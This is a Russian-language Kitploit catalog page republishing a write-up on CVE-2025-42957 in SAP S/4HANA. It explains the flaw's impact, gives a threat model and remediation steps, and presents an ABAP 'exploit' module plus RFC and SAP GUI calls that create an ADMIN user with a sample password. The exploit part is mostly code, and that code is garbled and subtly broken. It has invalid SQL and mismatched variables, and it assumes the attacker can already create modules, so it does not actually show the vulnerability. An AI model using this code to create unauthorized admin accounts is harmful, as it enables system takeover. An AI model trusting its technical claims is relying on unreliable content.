Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-42957-SAP-S-4HANA-Under-Siege — CVE‑2025‑42957 затрагивает RFC-модуль SAP S/4HANA, который позволяет пользователям с низкими привилегиями внедрять ABAP-код для создания учётных записей администратора и получения полного контроля. В статье объясняется уязвимость, модель угроз, приводится минимальный ABAP-код эксплойта, а также перечислены шаги по установке исправлений и мониторингу для защиты системы. | Kitploit
Инструменты/GitHubGitHub/mrk336/cve-2025-42957-sap-s-4hana-under-siege
Повышение привилегийАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и ОбразованиеRed Teaming
GitHubmrk336/cve-2025-42957-sap-s-4hana-under-siege

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →

Описание

CVE‑2025‑42957 затрагивает RFC-модуль SAP S/4HANA, который позволяет пользователям с низкими привилегиями внедрять ABAP-код для создания учётных записей администратора и получения полного контроля. В статье объясняется уязвимость, модель угроз, приводится минимальный ABAP-код эксплойта, а также перечислены шаги по установке исправлений и мониторингу для защиты системы.

CVE-2025-42957-SAP-S-4HANA-Under-Siege

Репозиторий
3221 год назадЕщё не проверено
Поделиться

CVE-2025-42957-SAP-S-4HANA-Под-Осадой


1 – Что произошло?

В августе 2025 года во флагманской ERP-платформе SAP S/4HANA была обнаружена уязвимость в одном из её RFC-функциональных модулей. Злоумышленники, обладающие лишь доступом с низкими привилегиями, могут внедрять произвольный ABAP-код в этот модуль, обходя стандартные проверки авторизации и получая полный контроль над системой.

Этот дефект — не теоретический курьёз: он уже был проэксплуатирован SecurityBridge Threat Research Labs и активно используется в реальных атаках как на локальные (on-premise), так и на private-cloud развёртывания.


2 – Почему это важно

ПроблемаВоздействие
Полная компрометация системыЗлоумышленники могут создавать учётные записи суперпользователя, изменять бизнес-процессы и извлекать хэши паролей из таблицы USR02.
Минимум усилийRFC-вызов легко сконструировать; как только функциональный модуль на месте, злоумышленнику нужно лишь несколько строк ABAP-кода.
Реальная угрозаSecurityBridge подтвердила, что атаки уже идут — если вы не установите патч немедленно, вы рискуете полным захватом вашего экземпляра S/4HANA.

3 – Моделирование угроз

  1. Точка входа – RFC-функциональный модуль ZVULN_EXPL, который мы создаём в SE37, является единственной точкой входа для злоумышленника.
  2. Путь повышения привилегий – внедрённый ABAP-код добавляет нового пользователя в USR02 и назначает ему административные права, фактически обходя стандартный объект авторизации SAP S_DMIS (действие 02).
  3. Вектор воздействия – оказавшись внутри, злоумышленник может:
    • Создавать дополнительные RFC-модули,
    • Изменять критически важную бизнес-логику,
    • Собирать сохранённые хэши паролей для горизонтального перемещения.

Таким образом, цепочка эксплуатации выглядит так: пользователь с низкими привилегиями → RFC-вызов к ZVULN_EXPL → новый администратор в USR02 → полный контроль над системой.


4 – Эксплойт-код

Ниже приведён ABAP-код, который мы помещаем в функциональный модуль ZVULN_EXPL. Он намеренно минималистичен, но при этом полон — он создаёт нового пользователя и записывает действие в журнал для последующей проверки.

root@kitploit:~
*---------------------------------------------------------------------*
*  RFC‑exposed function module for CVE‑2025‑42957 exploit        *
*---------------------------------------------------------------------*

FUNCTION z_vuln_expl.
*"------------------------------------------------------------------*
*"  IMPORTING
*"     VALUE(iv_user)   TYPE syuname    "SAP user name
*"     VALUE(iv_role)   TYPE susr02-roleid "Role to be assigned
*"     VALUE(iv_passwd) TYPE susr02-pwd   "Password for the new user
*"------------------------------------------------------------------*
*"  TABLES
*"     usr02
*"------------------------------------------------------------------*

* Local data declarations ----------------------------------------*/
DATA: lv_user_id   TYPE syuname,
      lv_role      TYPE susr02-roleid,
      lv_password  TYPE susr02-pwd.

* Assign the parameters to local variables -----------------------*/
lv_user_id = iv_user.
lv_role    = iv_role.
lv_passwd  = iv_passwd.

*---------------------------------------------------------------------*
*  1. Create a new user entry in USR02                        *
*---------------------------------------------------------------------*/
INSERT INTO usr02 (usr01, usr02)
  VALUES ( lv_user_id,
           'ADMIN' ).            "Assign the ‘ADMIN’ role

* 2. Assign password & profile ----------------------------------*/
UPDATE usr02
   SET pwd = lv_password,
       roleid = lv_role
   WHERE usr01 = lv_user_id.

*---------------------------------------------------------------------*
* 3. Log the operation (optional) ------------------------------*/
INSERT INTO tstm1 VALUES (
        sy-uname,                 "creator user
        sy-datum,                  "timestamp
        'ZVULN_EXPL',             "function name
        |lv_user_id||lv_role|    "message
        ).                       "store in the ABAP trace table

ENDFUNCTION.

Как вызвать

Из внешнего клиента (Linux/Mac)

root@kitploit:~
sapnwrfc -U <caller_user> \
          -P <caller_passwd> \
          -S S4HANA \
          -F ZVULN_EXPL \
          -D iv_user=admin2 \
          -D iv_role='ADMIN' \
          -D iv_passwd='Pa$$word123'

Из SAP GUI (быстрая проверка)

root@kitploit:~
CALL FUNCTION 'ZVULN_EXPL'
  EXPORTING
    iv_user = 'admin2'
    iv_role = 'ADMIN'
    iv_passwd = 'Pa$$word123'.

После вызова вы должны увидеть новую запись в USR02 для пользователя admin2 с ролью ADMIN.


5 – Шаги по устранению уязвимости

  1. Немедленно установите патчи безопасности SAP за август 2025 года.
    Патч устраняет уязвимость в исходном RFC-функциональном модуле и закрывает конкретный вектор, который используют злоумышленники.

  2. Отслеживайте журналы на предмет подозрительных RFC-вызовов и несанкционированного создания администраторов.
    Используйте транзакцию SM59, чтобы отслеживать новые записи в TSTM1 с именем функции ZVULN_EXPL.

  3. Внедрите SAP UCON, чтобы ограничить использование RFC.
    Настройте объект авторизации S_DMIS (действие 02) так, чтобы только доверенные пользователи могли вызывать RFC-модули типа Z.

  4. Проверьте доступ к объекту авторизации S_DMIS, действие 02.
    Убедитесь, что этот объект есть только у ограниченного круга пользователей — это сократит поверхность атаки.


6 – Заключение

CVE-2025-42957 — это не просто очередной пункт в бюллетене безопасности; он открывает вектор с низкими привилегиями, который может привести к полному захвату системы, если не установить патч. Приведённый выше код демонстрирует, как злоумышленник может с минимальными усилиями создать учётную запись администратора. Своевременная установка патчей, мониторинг и ужесточение разрешений RFC закрывают дверь — и поддерживают ваш экземпляр S/4HANA в безопасности.

Этот репозиторий предназначен исключительно для образовательных целей и служит демонстрацией принципов моделирования угроз применительно к реальным уязвимостям. CVE-2025-42957 подчёркивает важность определения границ доверия, проверки входных данных и соблюдения принципа минимальных привилегий — ключевых основ проектирования безопасных систем. Весь предоставленный код и примеры предназначены для обучения и не должны использоваться в производственных средах или для несанкционированного тестирования.


*Автор: Mark Mallia
Дата: 10 сентября 2025

Скачать инструмент